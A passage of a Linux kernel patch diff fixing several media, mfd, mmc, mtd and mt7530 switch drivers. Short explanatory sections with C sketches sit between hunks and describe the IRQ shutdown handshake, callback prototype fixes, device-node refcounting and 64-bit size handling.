++	mb();
++
++	/*
++	 * Wait until any running IRQ handler has returned. The IRQ handler
++	 * may get called even after this (as it's a shared interrupt line)
++	 * but the 'irqs_enabled' flag will make the handler return immediately.
++	 */
++	for (unsigned int il = 0; il < ARRAY_SIZE(rkisp1->irqs); ++il) {
++		if (rkisp1->irqs[il] == -1)
++			continue;
++
++		/* Skip if the irq line is the same as previous */
++		if (il == 0 || rkisp1->irqs[il - 1] != rkisp1->irqs[il])
++			synchronize_irq(rkisp1->irqs[il]);
++	}
++
+ 	clk_bulk_disable_unprepare(rkisp1->clk_size, rkisp1->clks);
+ 	return pinctrl_pm_select_sleep_state(dev);
+ }
+@@ -321,6 +339,10 @@ static int __maybe_unused rkisp1_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
++	rkisp1->irqs_enabled = true;
++	/* Make sure the IRQ handler will see the above */
++	mb();
++
+ 	return 0;
+ }
+ 
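
The rkisp1 hunks (here and in the capture, CSI and ISP interrupt handlers) implement a standard quiescing handshake for a shared interrupt line: the suspend path clears a flag, issues a full barrier, and waits out any in-flight handler with synchronize_irq(); the handler bails out with IRQ_NONE once the flag is clear, so it never touches the hardware after the clocks are gated. A condensed sketch with hypothetical names:

	static irqreturn_t my_isr(int irq, void *ctx)
	{
		struct my_dev *dev = ctx;

		if (!dev->irqs_enabled)
			return IRQ_NONE;	/* device may be powered down */

		/* ... normal interrupt servicing ... */
		return IRQ_HANDLED;
	}

	static int my_runtime_suspend(struct device *d)
	{
		struct my_dev *dev = dev_get_drvdata(d);

		dev->irqs_enabled = false;
		mb();				/* pairs with the handler's read */
		synchronize_irq(dev->irq);	/* wait for a running handler */

		/* now safe to gate clocks and power */
		return 0;
	}
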
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+index 00dca284c1222..2af5c1a48070b 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+@@ -1023,6 +1023,9 @@ irqreturn_t rkisp1_isp_isr(int irq, void *ctx)
+ 	struct rkisp1_device *rkisp1 = dev_get_drvdata(dev);
+ 	u32 status, isp_err;
+ 
++	if (!rkisp1->irqs_enabled)
++		return IRQ_NONE;
++
+ 	status = rkisp1_read(rkisp1, RKISP1_CIF_ISP_MIS);
+ 	if (!status)
+ 		return IRQ_NONE;
+diff --git a/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c b/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c
+index aa65d70b6270a..7a2f558c981db 100644
+--- a/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c
++++ b/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c
+@@ -66,6 +66,7 @@ static void deinterlace_device_run(void *priv)
+ 	struct vb2_v4l2_buffer *src, *dst;
+ 	unsigned int hstep, vstep;
+ 	dma_addr_t addr;
++	int i;
+ 
+ 	src = v4l2_m2m_next_src_buf(ctx->fh.m2m_ctx);
+ 	dst = v4l2_m2m_next_dst_buf(ctx->fh.m2m_ctx);
+@@ -160,6 +161,26 @@ static void deinterlace_device_run(void *priv)
+ 	deinterlace_write(dev, DEINTERLACE_CH1_HORZ_FACT, hstep);
+ 	deinterlace_write(dev, DEINTERLACE_CH1_VERT_FACT, vstep);
+ 
++	/* neutral filter coefficients */
++	deinterlace_set_bits(dev, DEINTERLACE_FRM_CTRL,
++			     DEINTERLACE_FRM_CTRL_COEF_ACCESS);
++	readl_poll_timeout(dev->base + DEINTERLACE_STATUS, val,
++			   val & DEINTERLACE_STATUS_COEF_STATUS, 2, 40);
++
++	for (i = 0; i < 32; i++) {
++		deinterlace_write(dev, DEINTERLACE_CH0_HORZ_COEF0 + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++		deinterlace_write(dev, DEINTERLACE_CH0_VERT_COEF + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++		deinterlace_write(dev, DEINTERLACE_CH1_HORZ_COEF0 + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++		deinterlace_write(dev, DEINTERLACE_CH1_VERT_COEF + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++	}
++
++	deinterlace_clr_set_bits(dev, DEINTERLACE_FRM_CTRL,
++				 DEINTERLACE_FRM_CTRL_COEF_ACCESS, 0);
++
+ 	deinterlace_clr_set_bits(dev, DEINTERLACE_FIELD_CTRL,
+ 				 DEINTERLACE_FIELD_CTRL_FIELD_CNT_MSK,
+ 				 DEINTERLACE_FIELD_CTRL_FIELD_CNT(ctx->field));
+@@ -248,7 +269,6 @@ static irqreturn_t deinterlace_irq(int irq, void *data)
+ static void deinterlace_init(struct deinterlace_dev *dev)
+ {
+ 	u32 val;
+-	int i;
+ 
+ 	deinterlace_write(dev, DEINTERLACE_BYPASS,
+ 			  DEINTERLACE_BYPASS_CSC);
+@@ -284,27 +304,7 @@ static void deinterlace_init(struct deinterlace_dev *dev)
+ 
+ 	deinterlace_clr_set_bits(dev, DEINTERLACE_CHROMA_DIFF,
+ 				 DEINTERLACE_CHROMA_DIFF_TH_MSK,
+-				 DEINTERLACE_CHROMA_DIFF_TH(5));
+-
+-	/* neutral filter coefficients */
+-	deinterlace_set_bits(dev, DEINTERLACE_FRM_CTRL,
+-			     DEINTERLACE_FRM_CTRL_COEF_ACCESS);
+-	readl_poll_timeout(dev->base + DEINTERLACE_STATUS, val,
+-			   val & DEINTERLACE_STATUS_COEF_STATUS, 2, 40);
+-
+-	for (i = 0; i < 32; i++) {
+-		deinterlace_write(dev, DEINTERLACE_CH0_HORZ_COEF0 + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-		deinterlace_write(dev, DEINTERLACE_CH0_VERT_COEF + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-		deinterlace_write(dev, DEINTERLACE_CH1_HORZ_COEF0 + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-		deinterlace_write(dev, DEINTERLACE_CH1_VERT_COEF + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-	}
+-
+-	deinterlace_clr_set_bits(dev, DEINTERLACE_FRM_CTRL,
+-				 DEINTERLACE_FRM_CTRL_COEF_ACCESS, 0);
++				 DEINTERLACE_CHROMA_DIFF_TH(31));
+ }
+ 
+ static inline struct deinterlace_ctx *deinterlace_file2ctx(struct file *file)
+@@ -931,11 +931,18 @@ static int deinterlace_runtime_resume(struct device *device)
+ 		return ret;
+ 	}
+ 
++	ret = reset_control_deassert(dev->rstc);
++	if (ret) {
++		dev_err(dev->dev, "Failed to apply reset\n");
++
++		goto err_exclusive_rate;
++	}
++
+ 	ret = clk_prepare_enable(dev->bus_clk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "Failed to enable bus clock\n");
+ 
+-		goto err_exclusive_rate;
++		goto err_rst;
+ 	}
+ 
+ 	ret = clk_prepare_enable(dev->mod_clk);
+@@ -952,23 +959,16 @@ static int deinterlace_runtime_resume(struct device *device)
+ 		goto err_mod_clk;
+ 	}
+ 
+-	ret = reset_control_deassert(dev->rstc);
+-	if (ret) {
+-		dev_err(dev->dev, "Failed to apply reset\n");
+-
+-		goto err_ram_clk;
+-	}
+-
+ 	deinterlace_init(dev);
+ 
+ 	return 0;
+ 
+-err_ram_clk:
+-	clk_disable_unprepare(dev->ram_clk);
+ err_mod_clk:
+ 	clk_disable_unprepare(dev->mod_clk);
+ err_bus_clk:
+ 	clk_disable_unprepare(dev->bus_clk);
++err_rst:
++	reset_control_assert(dev->rstc);
+ err_exclusive_rate:
+ 	clk_rate_exclusive_put(dev->mod_clk);
+ 
+@@ -979,11 +979,12 @@ static int deinterlace_runtime_suspend(struct device *device)
+ {
+ 	struct deinterlace_dev *dev = dev_get_drvdata(device);
+ 
+-	reset_control_assert(dev->rstc);
+-
+ 	clk_disable_unprepare(dev->ram_clk);
+ 	clk_disable_unprepare(dev->mod_clk);
+ 	clk_disable_unprepare(dev->bus_clk);
++
++	reset_control_assert(dev->rstc);
++
+ 	clk_rate_exclusive_put(dev->mod_clk);
+ 
+ 	return 0;
+diff --git a/drivers/media/usb/em28xx/em28xx-cards.c b/drivers/media/usb/em28xx/em28xx-cards.c
+index 4d037c92af7c5..bae76023cf71d 100644
+--- a/drivers/media/usb/em28xx/em28xx-cards.c
++++ b/drivers/media/usb/em28xx/em28xx-cards.c
+@@ -4094,6 +4094,10 @@ static int em28xx_usb_probe(struct usb_interface *intf,
+ 	 * topology will likely change after the load of the em28xx subdrivers.
+ 	 */
+ #ifdef CONFIG_MEDIA_CONTROLLER
++	/*
++	 * No need to check the return value, the device will still be
++	 * usable without media controller API.
++	 */
+ 	retval = media_device_register(dev->media_dev);
+ #endif
+ 
+diff --git a/drivers/media/usb/go7007/go7007-driver.c b/drivers/media/usb/go7007/go7007-driver.c
+index 0c24e29843048..eb03f98b2ef11 100644
+--- a/drivers/media/usb/go7007/go7007-driver.c
++++ b/drivers/media/usb/go7007/go7007-driver.c
+@@ -80,7 +80,7 @@ static int go7007_load_encoder(struct go7007 *go)
+ 	const struct firmware *fw_entry;
+ 	char fw_name[] = "go7007/go7007fw.bin";
+ 	void *bounce;
+-	int fw_len, rv = 0;
++	int fw_len;
+ 	u16 intr_val, intr_data;
+ 
+ 	if (go->boot_fw == NULL) {
+@@ -109,9 +109,11 @@ static int go7007_load_encoder(struct go7007 *go)
+ 	    go7007_read_interrupt(go, &intr_val, &intr_data) < 0 ||
+ 			(intr_val & ~0x1) != 0x5a5a) {
+ 		v4l2_err(go, "error transferring firmware\n");
+-		rv = -1;
++		kfree(go->boot_fw);
++		go->boot_fw = NULL;
++		return -1;
+ 	}
+-	return rv;
++	return 0;
+ }
+ 
+ MODULE_FIRMWARE("go7007/go7007fw.bin");
+diff --git a/drivers/media/usb/go7007/go7007-usb.c b/drivers/media/usb/go7007/go7007-usb.c
+index eeb85981e02b6..762c13e49bfa5 100644
+--- a/drivers/media/usb/go7007/go7007-usb.c
++++ b/drivers/media/usb/go7007/go7007-usb.c
+@@ -1201,7 +1201,9 @@ static int go7007_usb_probe(struct usb_interface *intf,
+ 				u16 channel;
+ 
+ 				/* read channel number from GPIO[1:0] */
+-				go7007_read_addr(go, 0x3c81, &channel);
++				if (go7007_read_addr(go, 0x3c81, &channel))
++					goto allocfail;
++
+ 				channel &= 0x3;
+ 				go->board_id = GO7007_BOARDID_ADLINK_MPG24;
+ 				usb->board = board = &board_adlink_mpg24;
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-context.c b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+index 1764674de98bc..73c95ba2328a4 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-context.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+@@ -90,8 +90,10 @@ static void pvr2_context_destroy(struct pvr2_context *mp)
+ }
+ 
+ 
+-static void pvr2_context_notify(struct pvr2_context *mp)
++static void pvr2_context_notify(void *ptr)
+ {
++	struct pvr2_context *mp = ptr;
++
+ 	pvr2_context_set_notify(mp,!0);
+ }
+ 
+@@ -106,9 +108,7 @@ static void pvr2_context_check(struct pvr2_context *mp)
+ 		pvr2_trace(PVR2_TRACE_CTXT,
+ 			   "pvr2_context %p (initialize)", mp);
+ 		/* Finish hardware initialization */
+-		if (pvr2_hdw_initialize(mp->hdw,
+-					(void (*)(void *))pvr2_context_notify,
+-					mp)) {
++		if (pvr2_hdw_initialize(mp->hdw, pvr2_context_notify, mp)) {
+ 			mp->video_stream.stream =
+ 				pvr2_hdw_get_video_stream(mp->hdw);
+ 			/* Trigger interface initialization.  By doing this
+@@ -267,9 +267,9 @@ static void pvr2_context_exit(struct pvr2_context *mp)
+ void pvr2_context_disconnect(struct pvr2_context *mp)
+ {
+ 	pvr2_hdw_disconnect(mp->hdw);
+-	mp->disconnect_flag = !0;
+ 	if (!pvr2_context_shutok())
+ 		pvr2_context_notify(mp);
++	mp->disconnect_flag = !0;
+ }
+ 
+ 
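
The pvrusb2 hunks here and in the dvb and v4l2 files below all fix the same pattern: the driver cast functions taking a typed pointer to the void-pointer callback type at the registration site. Calling through a function pointer of mismatched prototype is undefined behaviour and is rejected outright by kernel CFI, so the fix declares each callback with the exact expected prototype and recovers the concrete type inside. Sketch:

	typedef void (*notify_cb_t)(void *ctx);

	static void my_notify(void *ptr)
	{
		struct my_state *st = ptr;	/* recover the concrete type here */

		wake_up(&st->wait);
	}

	/* registration needs no cast, and the call through the pointer is valid */
	register_notify(my_notify, st);		/* hypothetical registration helper */
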
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-dvb.c b/drivers/media/usb/pvrusb2/pvrusb2-dvb.c
+index 26811efe0fb58..9a9bae21c6147 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-dvb.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-dvb.c
+@@ -88,8 +88,10 @@ static int pvr2_dvb_feed_thread(void *data)
+ 	return stat;
+ }
+ 
+-static void pvr2_dvb_notify(struct pvr2_dvb_adapter *adap)
++static void pvr2_dvb_notify(void *ptr)
+ {
++	struct pvr2_dvb_adapter *adap = ptr;
++
+ 	wake_up(&adap->buffer_wait_data);
+ }
+ 
+@@ -149,7 +151,7 @@ static int pvr2_dvb_stream_do_start(struct pvr2_dvb_adapter *adap)
+ 	}
+ 
+ 	pvr2_stream_set_callback(pvr->video_stream.stream,
+-				 (pvr2_stream_callback) pvr2_dvb_notify, adap);
++				 pvr2_dvb_notify, adap);
+ 
+ 	ret = pvr2_stream_set_buffer_count(stream, PVR2_DVB_BUFFER_COUNT);
+ 	if (ret < 0) return ret;
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c b/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c
+index c04ab7258d645..d608b793fa847 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-v4l2.c
+@@ -1033,8 +1033,10 @@ static int pvr2_v4l2_open(struct file *file)
+ }
+ 
+ 
+-static void pvr2_v4l2_notify(struct pvr2_v4l2_fh *fhp)
++static void pvr2_v4l2_notify(void *ptr)
+ {
++	struct pvr2_v4l2_fh *fhp = ptr;
++
+ 	wake_up(&fhp->wait_data);
+ }
+ 
+@@ -1067,7 +1069,7 @@ static int pvr2_v4l2_iosetup(struct pvr2_v4l2_fh *fh)
+ 
+ 	hdw = fh->channel.mc_head->hdw;
+ 	sp = fh->pdi->stream->stream;
+-	pvr2_stream_set_callback(sp,(pvr2_stream_callback)pvr2_v4l2_notify,fh);
++	pvr2_stream_set_callback(sp, pvr2_v4l2_notify, fh);
+ 	pvr2_hdw_set_stream_type(hdw,fh->pdi->config);
+ 	if ((ret = pvr2_hdw_set_streaming(hdw,!0)) < 0) return ret;
+ 	return pvr2_ioread_set_enabled(fh->rhp,!0);
+@@ -1198,11 +1200,6 @@ static void pvr2_v4l2_dev_init(struct pvr2_v4l2_dev *dip,
+ 		dip->minor_type = pvr2_v4l_type_video;
+ 		nr_ptr = video_nr;
+ 		caps |= V4L2_CAP_VIDEO_CAPTURE | V4L2_CAP_AUDIO;
+-		if (!dip->stream) {
+-			pr_err(KBUILD_MODNAME
+-				": Failed to set up pvrusb2 v4l video dev due to missing stream instance\n");
+-			return;
+-		}
+ 		break;
+ 	case VFL_TYPE_VBI:
+ 		dip->config = pvr2_config_vbi;
+diff --git a/drivers/media/v4l2-core/v4l2-mem2mem.c b/drivers/media/v4l2-core/v4l2-mem2mem.c
+index be7fde1ed3eaa..97645d6509e1c 100644
+--- a/drivers/media/v4l2-core/v4l2-mem2mem.c
++++ b/drivers/media/v4l2-core/v4l2-mem2mem.c
+@@ -1084,11 +1084,17 @@ static int v4l2_m2m_register_entity(struct media_device *mdev,
+ 	entity->function = function;
+ 
+ 	ret = media_entity_pads_init(entity, num_pads, pads);
+-	if (ret)
++	if (ret) {
++		kfree(entity->name);
++		entity->name = NULL;
+ 		return ret;
++	}
+ 	ret = media_device_register_entity(mdev, entity);
+-	if (ret)
++	if (ret) {
++		kfree(entity->name);
++		entity->name = NULL;
+ 		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mfd/altera-sysmgr.c b/drivers/mfd/altera-sysmgr.c
+index 5d3715a28b28e..dbe1009943718 100644
+--- a/drivers/mfd/altera-sysmgr.c
++++ b/drivers/mfd/altera-sysmgr.c
+@@ -110,7 +110,9 @@ struct regmap *altr_sysmgr_regmap_lookup_by_phandle(struct device_node *np,
+ 
+ 	dev = driver_find_device_by_of_node(&altr_sysmgr_driver.driver,
+ 					    (void *)sysmgr_np);
+-	of_node_put(sysmgr_np);
++	if (property)
++		of_node_put(sysmgr_np);
++
+ 	if (!dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 
+diff --git a/drivers/mfd/syscon.c b/drivers/mfd/syscon.c
+index 6196724ef39bb..ecfe151220919 100644
+--- a/drivers/mfd/syscon.c
++++ b/drivers/mfd/syscon.c
+@@ -223,7 +223,9 @@ struct regmap *syscon_regmap_lookup_by_phandle(struct device_node *np,
+ 		return ERR_PTR(-ENODEV);
+ 
+ 	regmap = syscon_node_to_regmap(syscon_np);
+-	of_node_put(syscon_np);
++
++	if (property)
++		of_node_put(syscon_np);
+ 
+ 	return regmap;
+ }
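
Both the altera-sysmgr and syscon fixes encode the same refcount rule: of_parse_phandle() returns a node with its refcount elevated, but when no property name is given these lookups fall back to the caller's own node without taking a reference, so unconditionally calling of_node_put() dropped a reference the function never owned. Sketch of the rule, with a hypothetical conversion helper:

	static struct regmap *lookup(struct device_node *np, const char *property)
	{
		struct device_node *target;
		struct regmap *map;

		if (property)
			target = of_parse_phandle(np, property, 0);	/* +1 ref */
		else
			target = np;					/* borrowed */

		if (!target)
			return ERR_PTR(-ENODEV);

		map = node_to_regmap(target);	/* hypothetical conversion helper */

		if (property)
			of_node_put(target);	/* drop only the ref we took */

		return map;
	}
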
+diff --git a/drivers/mmc/host/wmt-sdmmc.c b/drivers/mmc/host/wmt-sdmmc.c
+index 9aa3027ca25e4..f2abebb2d8574 100644
+--- a/drivers/mmc/host/wmt-sdmmc.c
++++ b/drivers/mmc/host/wmt-sdmmc.c
+@@ -886,7 +886,6 @@ static int wmt_mci_remove(struct platform_device *pdev)
+ {
+ 	struct mmc_host *mmc;
+ 	struct wmt_mci_priv *priv;
+-	struct resource *res;
+ 	u32 reg_tmp;
+ 
+ 	mmc = platform_get_drvdata(pdev);
+@@ -914,9 +913,6 @@ static int wmt_mci_remove(struct platform_device *pdev)
+ 	clk_disable_unprepare(priv->clk_sdmmc);
+ 	clk_put(priv->clk_sdmmc);
+ 
+-	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	release_mem_region(res->start, resource_size(res));
+-
+ 	mmc_free_host(mmc);
+ 
+ 	dev_info(&pdev->dev, "WMT MCI device removed\n");
+diff --git a/drivers/mtd/maps/physmap-core.c b/drivers/mtd/maps/physmap-core.c
+index 19dad5a23f944..8cdb3512107d3 100644
+--- a/drivers/mtd/maps/physmap-core.c
++++ b/drivers/mtd/maps/physmap-core.c
+@@ -524,7 +524,7 @@ static int physmap_flash_probe(struct platform_device *dev)
+ 		if (!info->maps[i].phys)
+ 			info->maps[i].phys = res->start;
+ 
+-		info->win_order = get_bitmask_order(resource_size(res)) - 1;
++		info->win_order = fls64(resource_size(res)) - 1;
+ 		info->maps[i].size = BIT(info->win_order +
+ 					 (info->gpios ?
+ 					  info->gpios->ndescs : 0));
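
The physmap change swaps get_bitmask_order(), which takes a 32-bit argument, for fls64(), so resource sizes of 4 GiB and above compute a sane window order. For a power-of-two size, fls64(size) - 1 is log2(size); truncation to 32 bits would have produced garbage. A user-space demonstration:

	#include <stdint.h>
	#include <stdio.h>

	static int fls64_demo(uint64_t x)	/* same result as the kernel's fls64() */
	{
		return x ? 64 - __builtin_clzll(x) : 0;
	}

	int main(void)
	{
		uint64_t size = 1ULL << 32;	/* a 4 GiB flash window */

		printf("%d\n", fls64_demo(size) - 1);		/* 32: correct order */
		printf("%d\n", fls64_demo((uint32_t)size) - 1);	/* -1: after 32-bit truncation */
		return 0;
	}
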
+diff --git a/drivers/mtd/nand/raw/lpc32xx_mlc.c b/drivers/mtd/nand/raw/lpc32xx_mlc.c
+index 452ecaf7775ac..1cfe3dd0bad4d 100644
+--- a/drivers/mtd/nand/raw/lpc32xx_mlc.c
++++ b/drivers/mtd/nand/raw/lpc32xx_mlc.c
+@@ -303,8 +303,9 @@ static int lpc32xx_nand_device_ready(struct nand_chip *nand_chip)
+ 	return 0;
+ }
+ 
+-static irqreturn_t lpc3xxx_nand_irq(int irq, struct lpc32xx_nand_host *host)
++static irqreturn_t lpc3xxx_nand_irq(int irq, void *data)
+ {
++	struct lpc32xx_nand_host *host = data;
+ 	uint8_t sr;
+ 
+ 	/* Clear interrupt flag by reading status */
+@@ -779,7 +780,7 @@ static int lpc32xx_nand_probe(struct platform_device *pdev)
+ 		goto release_dma_chan;
+ 	}
+ 
+-	if (request_irq(host->irq, (irq_handler_t)&lpc3xxx_nand_irq,
++	if (request_irq(host->irq, &lpc3xxx_nand_irq,
+ 			IRQF_TRIGGER_HIGH, DRV_NAME, host)) {
+ 		dev_err(&pdev->dev, "Error requesting NAND IRQ\n");
+ 		res = -ENXIO;
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index b988c8a40d536..07065c1af55e4 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -998,20 +998,56 @@ static void mt7530_setup_port5(struct dsa_switch *ds, phy_interface_t interface)
+ 	mutex_unlock(&priv->reg_mutex);
+ }
+ 
++/* On page 205, section "8.6.3 Frame filtering" of the active standard, IEEE Std
++ * 802.1Q™-2022, it is stated that frames with 01:80:C2:00:00:00-0F as MAC DA
++ * must only be propagated to C-VLAN and MAC Bridge components. That means
++ * VLAN-aware and VLAN-unaware bridges. On the switch designs with CPU ports,
++ * these frames are supposed to be processed by the CPU (software). So we make
++ * the switch only forward them to the CPU port. And if received from a CPU
++ * port, forward to a single port. The software is responsible of making the
++ * switch conform to the latter by setting a single port as destination port on
++ * the special tag.
++ *
++ * This switch intellectual property cannot conform to this part of the standard
++ * fully. Whilst the REV_UN frame tag covers the remaining :04-0D and :0F MAC
++ * DAs, it also includes :22-FF which the scope of propagation is not supposed
++ * to be restricted for these MAC DAs.
++ */
+ static void
+ mt753x_trap_frames(struct mt7530_priv *priv)
+ {
+-	/* Trap BPDUs to the CPU port(s) */
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++	/* Trap 802.1X PAE frames and BPDUs to the CPU port(s) and egress them
++	 * VLAN-untagged.
++	 */
++	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_EG_TAG_MASK |
++		   MT753X_PAE_PORT_FW_MASK | MT753X_BPDU_EG_TAG_MASK |
++		   MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_PAE_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++		   MT753X_BPDU_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+ 		   MT753X_BPDU_CPU_ONLY);
+ 
+-	/* Trap 802.1X PAE frames to the CPU port(s) */
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_PORT_FW_MASK,
+-		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY));
++	/* Trap frames with :01 and :02 MAC DAs to the CPU port(s) and egress
++	 * them VLAN-untagged.
++	 */
++	mt7530_rmw(priv, MT753X_RGAC1, MT753X_R02_EG_TAG_MASK |
++		   MT753X_R02_PORT_FW_MASK | MT753X_R01_EG_TAG_MASK |
++		   MT753X_R01_PORT_FW_MASK,
++		   MT753X_R02_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_R02_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++		   MT753X_R01_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_BPDU_CPU_ONLY);
+ 
+-	/* Trap LLDP frames with :0E MAC DA to the CPU port(s) */
+-	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_PORT_FW_MASK,
+-		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY));
++	/* Trap frames with :03 and :0E MAC DAs to the CPU port(s) and egress
++	 * them VLAN-untagged.
++	 */
++	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_EG_TAG_MASK |
++		   MT753X_R0E_PORT_FW_MASK | MT753X_R03_EG_TAG_MASK |
++		   MT753X_R03_PORT_FW_MASK,
++		   MT753X_R0E_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++		   MT753X_R03_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++		   MT753X_BPDU_CPU_ONLY);
+ }
+ 
+ static int
+@@ -2187,11 +2223,11 @@ mt7530_setup(struct dsa_switch *ds)
+ 	 */
+ 	if (priv->mcm) {
+ 		reset_control_assert(priv->rstc);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		reset_control_deassert(priv->rstc);
+ 	} else {
+ 		gpiod_set_value_cansleep(priv->reset, 0);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		gpiod_set_value_cansleep(priv->reset, 1);
+ 	}
+ 
+@@ -2401,11 +2437,11 @@ mt7531_setup(struct dsa_switch *ds)
+ 	 */
+ 	if (priv->mcm) {
+ 		reset_control_assert(priv->rstc);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		reset_control_deassert(priv->rstc);
+ 	} else {
+ 		gpiod_set_value_cansleep(priv->reset, 0);
+-		usleep_range(1000, 1100);
++		usleep_range(5000, 5100);
+ 		gpiod_set_value_cansleep(priv->reset, 1);
+ 	}
+ 
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index 6202b0f8c3f34..fa2afa67ceb07 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -63,14 +63,33 @@ enum mt753x_id {
+ 
+ /* Registers for BPDU and PAE frame control*/
+ #define MT753X_BPC			0x24
+-#define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
++#define  MT753X_PAE_EG_TAG_MASK		GENMASK(24, 22)
++#define  MT753X_PAE_EG_TAG(x)		FIELD_PREP(MT753X_PAE_EG_TAG_MASK, x)
+ #define  MT753X_PAE_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_PAE_PORT_FW(x)		FIELD_PREP(MT753X_PAE_PORT_FW_MASK, x)
++#define  MT753X_BPDU_EG_TAG_MASK	GENMASK(8, 6)
++#define  MT753X_BPDU_EG_TAG(x)		FIELD_PREP(MT753X_BPDU_EG_TAG_MASK, x)
++#define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
++
++/* Register for :01 and :02 MAC DA frame control */
++#define MT753X_RGAC1			0x28
++#define  MT753X_R02_EG_TAG_MASK		GENMASK(24, 22)
++#define  MT753X_R02_EG_TAG(x)		FIELD_PREP(MT753X_R02_EG_TAG_MASK, x)
++#define  MT753X_R02_PORT_FW_MASK	GENMASK(18, 16)
++#define  MT753X_R02_PORT_FW(x)		FIELD_PREP(MT753X_R02_PORT_FW_MASK, x)
++#define  MT753X_R01_EG_TAG_MASK		GENMASK(8, 6)
++#define  MT753X_R01_EG_TAG(x)		FIELD_PREP(MT753X_R01_EG_TAG_MASK, x)
++#define  MT753X_R01_PORT_FW_MASK	GENMASK(2, 0)
+ 
+ /* Register for :03 and :0E MAC DA frame control */
+ #define MT753X_RGAC2			0x2c
++#define  MT753X_R0E_EG_TAG_MASK		GENMASK(24, 22)
++#define  MT753X_R0E_EG_TAG(x)		FIELD_PREP(MT753X_R0E_EG_TAG_MASK, x)
+ #define  MT753X_R0E_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_R0E_PORT_FW(x)		FIELD_PREP(MT753X_R0E_PORT_FW_MASK, x)
++#define  MT753X_R03_EG_TAG_MASK		GENMASK(8, 6)
++#define  MT753X_R03_EG_TAG(x)		FIELD_PREP(MT753X_R03_EG_TAG_MASK, x)
++#define  MT753X_R03_PORT_FW_MASK	GENMASK(2, 0)
+ 
+ enum mt753x_bpdu_port_fw {
+ 	MT753X_BPDU_FOLLOW_MFC,
+@@ -251,6 +270,7 @@ enum mt7530_port_mode {
+ enum mt7530_vlan_port_eg_tag {
+ 	MT7530_VLAN_EG_DISABLED = 0,
+ 	MT7530_VLAN_EG_CONSISTENT = 1,
++	MT7530_VLAN_EG_UNTAGGED = 4,
+ };
+ 
+ enum mt7530_vlan_port_attr {
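The register macros added above follow the stock GENMASK()/FIELD_PREP()
idiom: each three-bit forwarding or egress-tag control is described by a
mask, and FIELD_PREP() shifts a value into position so several fields can
be written in one read-modify-write. A user-space sketch of how
mt753x_trap_frames() composes the MT753X_BPC update; GENMASK()/FIELD_PREP()
are re-derived here for the demo (the kernel versions live in
<linux/bits.h> and <linux/bitfield.h>), and the numeric value of
MT753X_BPDU_CPU_ONLY is assumed:

#include <stdint.h>
#include <stdio.h>

#define GENMASK(h, l)		(((~0u) << (l)) & (~0u >> (31 - (h))))
#define FIELD_PREP(mask, v)	(((v) << __builtin_ctz(mask)) & (mask))

#define MT753X_PAE_EG_TAG_MASK		GENMASK(24, 22)
#define MT753X_PAE_PORT_FW_MASK		GENMASK(18, 16)
#define MT753X_BPDU_EG_TAG_MASK		GENMASK(8, 6)
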